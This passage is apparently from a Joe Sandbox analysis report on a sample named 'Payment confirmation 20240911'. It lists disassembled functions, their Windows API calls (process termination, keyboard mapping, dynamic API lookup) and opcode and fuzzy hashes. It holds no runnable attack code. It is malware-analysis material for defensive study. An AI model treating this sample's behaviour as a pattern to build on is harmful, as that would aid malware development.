                                          • Opcode Fuzzy Hash: b78d43bee774e05f8e6a1340aeb0de293cc0b54dfeba9e2da247cc423bbdaeeb
                                          • Instruction Fuzzy Hash: 58519B31218205AFC714EFA8C884E6FBBE8FF99308F44491DF586972A0DB71E915CB52
                                          Function 012FDB8C Relevance: 9.2, APIs: 6, Instructions: 160COMMON
                                          Download Yara Rule
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.350834182.00000000012E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 012E0000, based on PE: true
                                          • Associated: 00000000.00000002.350831871.00000000012E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350843003.000000000136D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350843003.000000000138E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350852852.000000000139A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350855461.00000000013A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_12e0000_Payment confirmation 20240911.jbxd
                                          Similarity
                                          • API ID: _wcscpy$_wcscat
                                          • String ID:
                                          • API String ID: 2037614760-0
                                          • Opcode ID: f1f98a6ec25caa01f90f5d415b32dc8c6c5e2b15692a0a50f5ac00c05728c96b
                                          • Instruction ID: 7c69d9fd74ee635bbe9c3c76ccb4183f3110a10a94016e31defa9ed10ddbaaa4
                                          • Opcode Fuzzy Hash: f1f98a6ec25caa01f90f5d415b32dc8c6c5e2b15692a0a50f5ac00c05728c96b
                                          • Instruction Fuzzy Hash: 7E51F33192411EAACF12AFDDC440EBDF7B0FF14715F50406EEB81AB291DBB49A428790
                                          Function 01322ADC Relevance: 9.2, APIs: 6, Instructions: 158COMMON
                                          Download Yara Rule
                                          APIs
                                          • VariantInit.OLEAUT32(?), ref: 01322AF6
                                          • VariantClear.OLEAUT32(00000013), ref: 01322B68
                                          • VariantClear.OLEAUT32(00000000), ref: 01322BC3
                                          • _memmove.LIBCMT ref: 01322BED
                                          • VariantClear.OLEAUT32(?), ref: 01322C3A
                                          • VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 01322C68
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.350834182.00000000012E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 012E0000, based on PE: true
                                          • Associated: 00000000.00000002.350831871.00000000012E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350843003.000000000136D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350843003.000000000138E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350852852.000000000139A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350855461.00000000013A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_12e0000_Payment confirmation 20240911.jbxd
                                          Similarity
                                          • API ID: Variant$Clear$ChangeInitType_memmove
                                          • String ID:
                                          • API String ID: 1101466143-0
                                          • Opcode ID: 688cf369363e6a6062813d811e67855c58238dc8ab5377fbee8bccc7542f0a41
                                          • Instruction ID: b160c4de0f5094a52a02b87ca995e105be62b35a1a6f0de8dfe6de0104547bc9
                                          • Opcode Fuzzy Hash: 688cf369363e6a6062813d811e67855c58238dc8ab5377fbee8bccc7542f0a41
                                          • Instruction Fuzzy Hash: 6D515BB5A00219EFDB24DF98C880EAAB7B8FF4C314B158559E959DB314D730E951CFA0
                                          Function 013482DB Relevance: 9.2, APIs: 6, Instructions: 152windowCOMMON
                                          Download Yara Rule
                                          APIs
                                          • GetMenu.USER32(?,00000001,00000000), ref: 0134833D
                                          • GetMenuItemCount.USER32(00000000), ref: 01348374
                                          • GetMenuStringW.USER32(00000000,00000000,?,00007FFF,00000400), ref: 0134839C
                                          • GetMenuItemID.USER32(?,?), ref: 0134840B
                                          • GetSubMenu.USER32(?,?), ref: 01348419
                                          • PostMessageW.USER32 ref: 0134846A
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.350834182.00000000012E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 012E0000, based on PE: true
                                          • Associated: 00000000.00000002.350831871.00000000012E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350843003.000000000136D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350843003.000000000138E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350852852.000000000139A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350855461.00000000013A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_12e0000_Payment confirmation 20240911.jbxd
                                          Similarity
                                          • API ID: Menu$Item$CountMessagePostString
                                          • String ID:
                                          • API String ID: 650687236-0
                                          • Opcode ID: ebd7a38d09c316b558b41773cb9f662f42220d3d20c3b282a379c70d14650643
                                          • Instruction ID: 6dd44cca0d09abe1e0e68b6210444850f74357b8075cc49e2f3abdf6b94df85a
                                          • Opcode Fuzzy Hash: ebd7a38d09c316b558b41773cb9f662f42220d3d20c3b282a379c70d14650643
                                          • Instruction Fuzzy Hash: BC519075A00219EFCF11EFA8C944AAEBBF4EF48714F0484A9E955B7350DB70BE418B90
                                          Function 013254E0 Relevance: 9.1, APIs: 6, Instructions: 136windowCOMMON
                                          Download Yara Rule
                                          APIs
                                          • _memset.LIBCMT ref: 0132552E
                                          • GetMenuItemInfoW.USER32 ref: 01325579
                                          • IsMenu.USER32(00000000), ref: 01325599
                                          • CreatePopupMenu.USER32 ref: 013255CD
                                          • GetMenuItemCount.USER32(000000FF), ref: 0132562B
                                          • InsertMenuItemW.USER32(00000000,?,00000001,00000030), ref: 0132565C
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.350834182.00000000012E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 012E0000, based on PE: true
                                          • Associated: 00000000.00000002.350831871.00000000012E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350843003.000000000136D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350843003.000000000138E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350852852.000000000139A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350855461.00000000013A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_12e0000_Payment confirmation 20240911.jbxd
                                          Similarity
                                          • API ID: Menu$Item$CountCreateInfoInsertPopup_memset
                                          • String ID:
                                          • API String ID: 3311875123-0
                                          • Opcode ID: 52b422ddc985b3b0d140262e86ee70b759c5cbeeab0b1e3031c86c34d1f02b6c
                                          • Instruction ID: e64793eb6bd14566a4af98294316174a9a1174d5ecfbbf343291d65ef3bf6e38
                                          • Opcode Fuzzy Hash: 52b422ddc985b3b0d140262e86ee70b759c5cbeeab0b1e3031c86c34d1f02b6c
                                          • Instruction Fuzzy Hash: 3E51B17060026ADFEF21EF6CD888BEDBBF9AF0532CF144119E5559B291D3709A44CB51
                                          Function 012FB18C Relevance: 9.1, APIs: 6, Instructions: 113COMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 012FAF7D: GetWindowLongW.USER32(?,000000EB), ref: 012FAF8E
                                          • BeginPaint.USER32(?,?), ref: 012FB1C1
                                          • GetWindowRect.USER32(?,?), ref: 012FB225
                                          • ScreenToClient.USER32(?,?), ref: 012FB242
                                          • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 012FB253
                                          • EndPaint.USER32(?,?), ref: 012FB29D
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.350834182.00000000012E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 012E0000, based on PE: true
                                          • Associated: 00000000.00000002.350831871.00000000012E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350843003.000000000136D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350843003.000000000138E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350852852.000000000139A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350855461.00000000013A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_12e0000_Payment confirmation 20240911.jbxd
                                          Similarity
                                          • API ID: PaintWindow$BeginClientLongRectScreenViewport
                                          • String ID:
                                          • API String ID: 1827037458-0
                                          • Opcode ID: 2ac2e9825888f660e0ec820dce6e0d71e3ea3d0904398c2bc5f3b92afc103416
                                          • Instruction ID: 108123dfbf3828d8131e539e588aef17afa117d04573b1022cc041af07c8fcab
                                          • Opcode Fuzzy Hash: 2ac2e9825888f660e0ec820dce6e0d71e3ea3d0904398c2bc5f3b92afc103416
                                          • Instruction Fuzzy Hash: 4841CD75200201DFDB21DF28D888FBABBECFB49724F04062DFA95872A1C7709845CB61
                                          Function 0134E1A7 Relevance: 9.1, APIs: 6, Instructions: 108windowCOMMON
                                          Download Yara Rule
                                          APIs
                                          • ShowWindow.USER32(013A1810,00000000), ref: 0134E21B
                                          • EnableWindow.USER32(00000000,00000000), ref: 0134E23F
                                          • ShowWindow.USER32(013A1810,00000000), ref: 0134E29F
                                          • ShowWindow.USER32(00000000,00000004), ref: 0134E2B1
                                          • EnableWindow.USER32(00000000,00000001), ref: 0134E2D5
                                          • SendMessageW.USER32(?,0000130C,?,00000000), ref: 0134E2F8
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.350834182.00000000012E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 012E0000, based on PE: true
                                          • Associated: 00000000.00000002.350831871.00000000012E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350843003.000000000136D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350843003.000000000138E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350852852.000000000139A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350855461.00000000013A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_12e0000_Payment confirmation 20240911.jbxd
                                          Similarity
                                          • API ID: Window$Show$Enable$MessageSend
                                          • String ID:
                                          • API String ID: 642888154-0
                                          • Opcode ID: 967faf85940df5cdd1b172d635d2988fc39a36d56390bfad4b5906805c4a6989
                                          • Instruction ID: 92f361754a2d0a5de9561be1763dce7a6582311ef38c584e4a880a2b1fa7bb20
                                          • Opcode Fuzzy Hash: 967faf85940df5cdd1b172d635d2988fc39a36d56390bfad4b5906805c4a6989
                                          • Instruction Fuzzy Hash: B2418035600141EFEB26DF68C499F947FE1BF0A318F1881B9EA598F2A2C735B841CB51
                                          Function 0134E9C8 Relevance: 9.0, APIs: 6, Instructions: 49COMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 012FB58B: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000), ref: 012FB5EB
                                            • Part of subcall function 012FB58B: SelectObject.GDI32(?,00000000), ref: 012FB5FA
                                            • Part of subcall function 012FB58B: BeginPath.GDI32(?), ref: 012FB611
                                            • Part of subcall function 012FB58B: SelectObject.GDI32(?,00000000), ref: 012FB63B
                                          • MoveToEx.GDI32(00000000,-00000002,?,00000000), ref: 0134E9F2
                                          • LineTo.GDI32(00000000,00000003,?), ref: 0134EA06
                                          • MoveToEx.GDI32(00000000,00000000,?,00000000), ref: 0134EA14
                                          • LineTo.GDI32(00000000,00000000,?), ref: 0134EA24
                                          • EndPath.GDI32(00000000), ref: 0134EA34
                                          • StrokePath.GDI32(00000000), ref: 0134EA44
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.350834182.00000000012E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 012E0000, based on PE: true
                                          • Associated: 00000000.00000002.350831871.00000000012E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350843003.000000000136D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350843003.000000000138E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350852852.000000000139A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350855461.00000000013A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_12e0000_Payment confirmation 20240911.jbxd
                                          Similarity
                                          • API ID: Path$LineMoveObjectSelect$BeginCreateStroke
                                          • String ID:
                                          • API String ID: 43455801-0
                                          • Opcode ID: 93dccdc118c0836e6d52381fb27fbb340d067be7b059c3c7470495519affecb2
                                          • Instruction ID: 3735a481c8dcd33c7744e6641b46231fa4654e580c45cc86c8f4673fb2d34d80
                                          • Opcode Fuzzy Hash: 93dccdc118c0836e6d52381fb27fbb340d067be7b059c3c7470495519affecb2
                                          • Instruction Fuzzy Hash: F011177610014DBFEF229F94DC88EAA7FADFB08394F048022FE494A164D771AD55DBA0
                                          Function 0131EF91 Relevance: 9.0, APIs: 6, Instructions: 48COMMON
                                          Download Yara Rule
                                          APIs
                                          • GetDC.USER32(00000000), ref: 0131EFB6
                                          • GetDeviceCaps.GDI32(00000000,00000058,?,?), ref: 0131EFC7
                                          • GetDeviceCaps.GDI32(00000000,0000005A,?,?), ref: 0131EFCE
                                          • ReleaseDC.USER32(00000000,00000000), ref: 0131EFD6
                                          • MulDiv.KERNEL32 ref: 0131EFED
                                          • MulDiv.KERNEL32 ref: 0131EFFF
                                            • Part of subcall function 0131A83B: RaiseException.KERNEL32(-C0000018,00000001,00000000,00000000,0131A79D,00000000,00000000,?,0131AB73), ref: 0131B2CA
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.350834182.00000000012E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 012E0000, based on PE: true
                                          • Associated: 00000000.00000002.350831871.00000000012E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350843003.000000000136D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350843003.000000000138E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350852852.000000000139A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350855461.00000000013A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_12e0000_Payment confirmation 20240911.jbxd
                                          Similarity
                                          • API ID: CapsDevice$ExceptionRaiseRelease
                                          • String ID:
                                          • API String ID: 603618608-0
                                          • Opcode ID: e77c54c02b17894194d1ed0a30753f16db751ccf79f049cce8f4c5dc52c8cde0
                                          • Instruction ID: 8c5e6a3d9c2248492d5744e643bcd51549116127b10f20b8edbc761845b1f6a2
                                          • Opcode Fuzzy Hash: e77c54c02b17894194d1ed0a30753f16db751ccf79f049cce8f4c5dc52c8cde0
                                          • Instruction Fuzzy Hash: 24018475B00205BFEB109BE69C45B5EBFB8EB48751F008066EE04AB294D6719C00CB60
                                          Function 013087D7 Relevance: 9.0, APIs: 6, Instructions: 45threadCOMMON
                                          Download Yara Rule
                                          APIs
                                          • __init_pointers.LIBCMT ref: 013087D7
                                            • Part of subcall function 01301E5A: __initp_misc_winsig.LIBCMT ref: 01301E7E
                                            • Part of subcall function 01301E5A: GetModuleHandleW.KERNEL32(kernel32.dll), ref: 01308BE1
                                            • Part of subcall function 01301E5A: GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 01308BF5
                                            • Part of subcall function 01301E5A: GetProcAddress.KERNEL32(00000000,FlsFree), ref: 01308C08
                                            • Part of subcall function 01301E5A: GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 01308C1B
                                            • Part of subcall function 01301E5A: GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 01308C2E
                                            • Part of subcall function 01301E5A: GetProcAddress.KERNEL32(00000000,InitializeCriticalSectionEx), ref: 01308C41
                                            • Part of subcall function 01301E5A: GetProcAddress.KERNEL32(00000000,CreateSemaphoreExW), ref: 01308C54
                                            • Part of subcall function 01301E5A: GetProcAddress.KERNEL32(00000000,SetThreadStackGuarantee), ref: 01308C67
                                            • Part of subcall function 01301E5A: GetProcAddress.KERNEL32(00000000,CreateThreadpoolTimer), ref: 01308C7A
                                            • Part of subcall function 01301E5A: GetProcAddress.KERNEL32(00000000,SetThreadpoolTimer), ref: 01308C8D
                                            • Part of subcall function 01301E5A: GetProcAddress.KERNEL32(00000000,WaitForThreadpoolTimerCallbacks), ref: 01308CA0
                                            • Part of subcall function 01301E5A: GetProcAddress.KERNEL32(00000000,CloseThreadpoolTimer), ref: 01308CB3
                                            • Part of subcall function 01301E5A: GetProcAddress.KERNEL32(00000000,CreateThreadpoolWait), ref: 01308CC6
                                            • Part of subcall function 01301E5A: GetProcAddress.KERNEL32(00000000,SetThreadpoolWait), ref: 01308CD9
                                            • Part of subcall function 01301E5A: GetProcAddress.KERNEL32(00000000,CloseThreadpoolWait), ref: 01308CEC
                                            • Part of subcall function 01301E5A: GetProcAddress.KERNEL32(00000000,FlushProcessWriteBuffers), ref: 01308CFF
                                          • __mtinitlocks.LIBCMT ref: 013087DC
                                            • Part of subcall function 01308AB3: InitializeCriticalSectionAndSpinCount.KERNEL32(0139AC68,00000FA0,?,?,013087E1,01306AFA,013967D8,00000014), ref: 01308AD1
                                          • __mtterm.LIBCMT ref: 013087E5
                                            • Part of subcall function 0130884D: DeleteCriticalSection.KERNEL32(00000000,00000000,?,?,013087EA,01306AFA,013967D8,00000014), ref: 013089CF
                                            • Part of subcall function 0130884D: _free.LIBCMT ref: 013089D6
                                            • Part of subcall function 0130884D: DeleteCriticalSection.KERNEL32(0139AC68,?,?,013087EA,01306AFA,013967D8,00000014), ref: 013089F8
                                          • __calloc_crt.LIBCMT ref: 0130880A
                                          • GetCurrentThreadId.KERNEL32(01306AFA,013967D8,00000014), ref: 01308833
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.350834182.00000000012E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 012E0000, based on PE: true
                                          • Associated: 00000000.00000002.350831871.00000000012E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350843003.000000000136D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350843003.000000000138E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350852852.000000000139A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350855461.00000000013A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_12e0000_Payment confirmation 20240911.jbxd
                                          Similarity
                                          • API ID: AddressProc$CriticalSection$Delete$CountCurrentHandleInitializeModuleSpinThread__calloc_crt__init_pointers__initp_misc_winsig__mtinitlocks__mtterm_free
                                          • String ID:
                                          • API String ID: 2942034483-0
                                          • Opcode ID: b8b2d1d02c005f688b717786bbbac76757825904a2186b6649ac3bb88ab91e9d
                                          • Instruction ID: 01405fcd7b8c650b5fd8e3b21ce1dfc020cd8aa40a17e7d46783be5718a4a834
                                          • Opcode Fuzzy Hash: b8b2d1d02c005f688b717786bbbac76757825904a2186b6649ac3bb88ab91e9d
                                          • Instruction Fuzzy Hash: 5EF090329197135AF677767DBC2574A3EC48F1173CB200AA9E0A4D64D8FF1184414254
                                          Function 0132A3D2 Relevance: 9.0, APIs: 6, Instructions: 44COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.350834182.00000000012E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 012E0000, based on PE: true
                                          • Associated: 00000000.00000002.350831871.00000000012E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350843003.000000000136D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350843003.000000000138E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350852852.000000000139A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350855461.00000000013A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_12e0000_Payment confirmation 20240911.jbxd
                                          Similarity
                                          • API ID: CriticalExchangeInterlockedSection$EnterLeaveObjectSingleTerminateThreadWait
                                          • String ID:
                                          • API String ID: 1423608774-0
                                          • Opcode ID: a72ee34fc7210edacaa6d73d8d48a20906ee1dce002a2aaf61b80625fb3a2787
                                          • Instruction ID: 79049e02d0c5777e271e0872b2fd6f371673b0c1abff65e20cce7289344f1ac3
                                          • Opcode Fuzzy Hash: a72ee34fc7210edacaa6d73d8d48a20906ee1dce002a2aaf61b80625fb3a2787
                                          • Instruction Fuzzy Hash: DC0186322012219BE7253B98ED48DEB7B69FF49716F004529F64393464CBB0A800CB50
                                          Function 012E1867 Relevance: 9.0, APIs: 6, Instructions: 44keyboardCOMMON
                                          Download Yara Rule
                                          APIs
                                          • MapVirtualKeyW.USER32(0000005B,00000000), ref: 012E1898
                                          • MapVirtualKeyW.USER32(00000010,00000000), ref: 012E18A0
                                          • MapVirtualKeyW.USER32(000000A0,00000000), ref: 012E18AB
                                          • MapVirtualKeyW.USER32(000000A1,00000000), ref: 012E18B6
                                          • MapVirtualKeyW.USER32(00000011,00000000), ref: 012E18BE
                                          • MapVirtualKeyW.USER32(00000012,00000000), ref: 012E18C6
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.350834182.00000000012E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 012E0000, based on PE: true
                                          • Associated: 00000000.00000002.350831871.00000000012E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350843003.000000000136D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350843003.000000000138E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350852852.000000000139A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350855461.00000000013A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_12e0000_Payment confirmation 20240911.jbxd
                                          Similarity
                                          • API ID: Virtual
                                          • String ID:
                                          • API String ID: 4278518827-0
                                          • Opcode ID: 7337f560e3d3bcb8cf81eb48cade698d76a066f63cb7228136fa8eb0df055a5c
                                          • Instruction ID: 2a5797c269cf4ec09a6cfb02ec43ba08c34a4c63bc63eb2383b92d5ed6982ff4
                                          • Opcode Fuzzy Hash: 7337f560e3d3bcb8cf81eb48cade698d76a066f63cb7228136fa8eb0df055a5c
                                          • Instruction Fuzzy Hash: 460144B0A02B5ABDE3008F6A8C85A52FEA8FF19354F04411BE15C47A42C7B5A864CBE5
                                          Function 013284F4 Relevance: 9.0, APIs: 6, Instructions: 42windowtimethreadCOMMON
                                          Download Yara Rule
                                          APIs
                                          • PostMessageW.USER32 ref: 01328504
                                          • SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 0132851A
                                          • GetWindowThreadProcessId.USER32(?,?), ref: 01328529
                                          • OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 01328538
                                          • TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 01328542
                                          • CloseHandle.KERNEL32(00000000), ref: 01328549
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.350834182.00000000012E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 012E0000, based on PE: true
                                          • Associated: 00000000.00000002.350831871.00000000012E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350843003.000000000136D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350843003.000000000138E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350852852.000000000139A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350855461.00000000013A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_12e0000_Payment confirmation 20240911.jbxd
                                          Similarity
                                          • API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
                                          • String ID:
                                          • API String ID: 839392675-0
                                          • Opcode ID: eb9984f35d6921f51c6bf34b64b083e2e8d4c2917c020b0813d6504ecf5e8176
                                          • Instruction ID: 2f78fca4a19cebea939944123c01dc367124c34b75a9b60e9cc1d9af1a7f850f
                                          • Opcode Fuzzy Hash: eb9984f35d6921f51c6bf34b64b083e2e8d4c2917c020b0813d6504ecf5e8176
                                          • Instruction Fuzzy Hash: C6F03A72340158BBE7315BA29D0EEEF7A7CDFCAB25F004058FA4591055E7E06A01C7B5
                                          Function 0132A31D Relevance: 9.0, APIs: 6, Instructions: 33synchronizationthreadCOMMONLIBRARYCODE
                                          Download Yara Rule
                                          APIs
                                          • InterlockedExchange.KERNEL32(?,?,?,?,?,013566D3,?,?,?,?,?,012EE681), ref: 0132A330
                                          • EnterCriticalSection.KERNEL32(?,?,?,?,013566D3,?,?,?,?,?,012EE681), ref: 0132A341
                                          • TerminateThread.KERNEL32(?,000001F6,?,?,?,013566D3,?,?,?,?,?,012EE681), ref: 0132A34E
                                          • WaitForSingleObject.KERNEL32(?,000003E8,?,?,?,013566D3,?,?,?,?,?,012EE681), ref: 0132A35B
                                            • Part of subcall function 01329CCE: CloseHandle.KERNEL32(?), ref: 01329CD8
                                          • InterlockedExchange.KERNEL32(?,000001F6,?,?,?,013566D3,?,?,?,?,?,012EE681), ref: 0132A36E
                                          • LeaveCriticalSection.KERNEL32(?,?,?,?,013566D3,?,?,?,?,?,012EE681), ref: 0132A375
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.350834182.00000000012E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 012E0000, based on PE: true
                                          • Associated: 00000000.00000002.350831871.00000000012E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350843003.000000000136D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350843003.000000000138E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350852852.000000000139A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350855461.00000000013A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_12e0000_Payment confirmation 20240911.jbxd
                                          Similarity
                                          • API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
                                          • String ID:
                                          • API String ID: 3495660284-0
                                          • Opcode ID: 317344d034b17cd61b91f4a297d1917c9383c0e42cf1faa183a19e48282377fb
                                          • Instruction ID: 8187fad0b5c896c1acd9c3abfeabbb4f47c454fb3f8ab51bca77e87ad31d580b
                                          • Opcode Fuzzy Hash: 317344d034b17cd61b91f4a297d1917c9383c0e42cf1faa183a19e48282377fb
                                          • Instruction Fuzzy Hash: 0CF08232241221ABE7212BA8ED4CEDB7B7DFF89712F004521F343924A8CBB59811CB60
                                          Function 012FD7C7 Relevance: 9.0, APIs: 4, Strings: 1, Instructions: 250COMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 0130010A: std::exception::exception.LIBCMT ref: 0130013E
                                            • Part of subcall function 0130010A: __CxxThrowException@8.LIBCMT ref: 01300153
                                            • Part of subcall function 012ECAEE: _memmove.LIBCMT ref: 012ECB2F
                                            • Part of subcall function 012EBBD9: _memmove.LIBCMT ref: 012EBC33
                                          • __swprintf.LIBCMT ref: 012FD98F
                                          Strings
                                          • \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs], xrefs: 012FD832
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.350834182.00000000012E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 012E0000, based on PE: true
                                          • Associated: 00000000.00000002.350831871.00000000012E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350843003.000000000136D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350843003.000000000138E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350852852.000000000139A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350855461.00000000013A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_12e0000_Payment confirmation 20240911.jbxd
                                          Similarity
